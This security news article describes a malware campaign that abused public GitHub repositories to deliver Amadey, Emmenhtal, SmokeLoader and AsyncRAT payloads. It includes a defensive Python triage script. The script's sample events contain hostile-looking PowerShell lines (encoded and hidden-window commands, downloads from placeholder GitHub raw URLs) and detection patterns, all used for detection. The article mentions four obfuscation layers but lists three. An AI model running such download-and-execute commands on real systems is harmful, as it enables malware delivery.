
GitHub Abused in Malware-as-a-Service Attack Campaign

Summary

– A new malware campaign uses public GitHub repositories to distribute malicious payloads via the Amadey botnet and Emmenhtal loaders, delivering malware like SmokeLoader and AsyncRAT.
– The Emmenhtal loader, initially seen in phishing emails targeting Ukrainian organizations, was later found in GitHub repositories, bypassing email-based distribution.
– GitHub was exploited as an open directory to host malware payloads, making detection harder because the platform is commonly reachable from enterprise networks.
– Three GitHub accounts (Legendary99999, DFfe9ewf, Milidmdds) were linked to the campaign, hosting repositories with malware, toolkits, and custom scripts.
– Despite different distribution methods, the GitHub-hosted Emmenhtal scripts mirrored those in the phishing campaign, featuring a four-layer obfuscation architecture.

Security researchers have flagged a sophisticated malware campaign that hijacks GitHub repositories to push dangerous payloads under a malware-as-a-service scheme. Tied to the Amadey botnet and Emmenhtal loaders, the operation funnels multiple threats (SmokeLoader, Lumma and AsyncRAT) into compromised systems.

The campaign first surfaced in phishing emails aimed at Ukrainian targets, but the Emmenhtal loader has now turned up in public GitHub repositories, showing a clear shift in how attackers deliver malicious code. Instead of relying solely on email lures, they exploit GitHub’s trusted status to dodge detection and land malware directly inside corporate environments.

GitHub’s widespread use makes it a tempting tool for attackers looking to blend in. By planting payloads in open repositories, threat actors ride on the platform’s reputation to slip through security defenses. Researchers tracked down three main GitHub accounts fueling the operation:

  • Legendary99999, home to over 160 malware-packed repositories
  • DFfe9ewf
  • Milidmdds

The structure was simple but effective. Files were set up for direct download via GitHub URLs. Once the Amadey botnet infected a machine, it reached back to GitHub to grab and run these payloads.

Technical ties connect these GitHub-hosted scripts to earlier phishing efforts. Both use a four-layer obfuscation process to cloak their activities:

  1. JavaScript-based PowerShell launchers
  2. AES-encrypted payloads
  3. Final PowerShell scripts aimed at specific IPs

Attackers even slipped in decoys like fake MP4 files and a Python script called “checkbalance.py”, posing as a crypto balance checker but actually launching malicious PowerShell commands behind the scenes.

Security experts recommend tightening defenses now. Companies should:

  • Block script-based attachments
  • Watch for unusual PowerShell activity
  • Reassess GitHub access policies
  • Use behavioral analytics to catch suspicious downloads
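The two monitoring recommendations above (watch for unusual PowerShell activity, use behavioral analytics to catch suspicious downloads) can be turned into a first-pass triage rule. The script below is an added example, not code from the article or from the researchers it cites. It applies a few checks to process-creation events: PowerShell launched by a script host (the JavaScript launchers and the Python decoy described above), an encoded command, a hidden window or execution-policy bypass, a download of a raw file from GitHub, and a parent executable running out of a user's Temp folder. The pipe-delimited log format, the field names, the sample lines and the example-account URLs are all constructed for this illustration; none of them are indicators from the campaign.

```python
"""Triage PowerShell process-creation events for the GitHub-hosted loader pattern.

Added example. The event format is a constructed, pipe-delimited log
(parent=...|image=...|cmd=...); it is not any vendor's schema.
"""
import re
from typing import Dict, List

# Constructed process-creation events (not real telemetry, not real IOCs).
SAMPLE_EVENTS = [
    r"parent=C:\Windows\explorer.exe|image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|cmd=powershell.exe -Command Get-Process",
    r"parent=C:\Windows\System32\wscript.exe|image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|cmd=powershell.exe -w hidden -ep bypass -enc SQBFAFgA",
    r"parent=C:\Python311\python.exe|image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|cmd=powershell.exe -NoP -c iwr https://raw.githubusercontent.com/example-account/example-repo/main/f.bin -OutFile C:\Users\Public\f.bin",
    r"parent=C:\Users\alice\AppData\Local\Temp\loader.exe|image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|cmd=powershell -c (New-Object Net.WebClient).DownloadString('https://github.com/example-account/example-repo/raw/main/x.ps1')",
    r"parent=C:\Program Files\Git\bin\git.exe|image=C:\Program Files\Git\mingw64\bin\curl.exe|cmd=curl -L https://github.com/example-org/tool/releases/download/v1.0/tool.zip",
]

POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}
# Script interpreters that should rarely be the parent of PowerShell on a workstation.
SCRIPT_HOST_PARENTS = {"wscript.exe", "cscript.exe", "mshta.exe", "python.exe", "pythonw.exe"}

# Raw-file URLs on GitHub (raw.githubusercontent.com or the /raw/ path on github.com).
GITHUB_RAW = re.compile(r"https?://(?:raw\.githubusercontent\.com/|github\.com/[^\s'\"]+/raw/)", re.I)
# Common PowerShell download primitives (cmdlets, .NET WebClient, and the curl/wget aliases).
DOWNLOAD_PRIMITIVE = re.compile(
    r"\b(?:iwr|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile|net\.webclient|start-bitstransfer|curl|wget)\b",
    re.I,
)
# -e, -ec, -enc and -EncodedCommand followed by an argument; "-ep" does not match because
# the word boundary after "-e" fails when "p" follows.
ENCODED = re.compile(r"(?:^|\s)-e(?:c|nc|ncodedcommand)?\b\s+\S", re.I)
HIDDEN_OR_BYPASS = re.compile(r"-w(?:indowstyle)?\s+hidden|-(?:ep|executionpolicy)\s+bypass", re.I)


def parse_event(line: str) -> Dict[str, str]:
    """Split 'parent=...|image=...|cmd=...' into a dict; cmd may itself contain '|'."""
    fields: Dict[str, str] = {}
    for part in line.split("|", 2):
        key, _, value = part.partition("=")
        fields[key.strip()] = value
    return fields


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze_event(line: str) -> List[str]:
    """Return the list of reasons this event looks like loader activity (empty if none)."""
    ev = parse_event(line)
    if basename(ev.get("image", "")) not in POWERSHELL_IMAGES:
        return []  # only PowerShell launches are in scope for this rule
    cmd = ev.get("cmd", "")
    parent_path = ev.get("parent", "")
    parent = basename(parent_path)
    reasons: List[str] = []
    if parent in SCRIPT_HOST_PARENTS:
        reasons.append(f"powershell spawned by script host {parent}")
    if "\\appdata\\local\\temp\\" in parent_path.lower():
        reasons.append("parent executable running from user Temp folder")
    if ENCODED.search(cmd):
        reasons.append("encoded command")
    if HIDDEN_OR_BYPASS.search(cmd):
        reasons.append("hidden window or execution policy bypass")
    if GITHUB_RAW.search(cmd) and DOWNLOAD_PRIMITIVE.search(cmd):
        reasons.append("download of raw file from github")
    return reasons


def analyze(lines: List[str]) -> Dict[int, List[str]]:
    """Map event index -> reasons for every event that triggered at least one check."""
    return {i: r for i, line in enumerate(lines) if (r := analyze_event(line))}


if __name__ == "__main__":
    for idx, reasons in analyze(SAMPLE_EVENTS).items():
        print(f"event {idx}: " + "; ".join(reasons))
```

The rule deliberately requires both a GitHub raw URL and a download primitive before it flags a fetch, so ordinary `git` and release downloads (the last sample line, which is not even a PowerShell launch) stay quiet; a single hit such as an encoded command is a reason to look, while two or more on one event is the combination the campaign description above would produce.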

GitHub has since removed the flagged accounts, but the incident underlines how legitimate platforms can be twisted into attack channels. Staying ahead of these tactics demands proactive monitoring and smarter safeguards.

(Source: InfoSecurity)
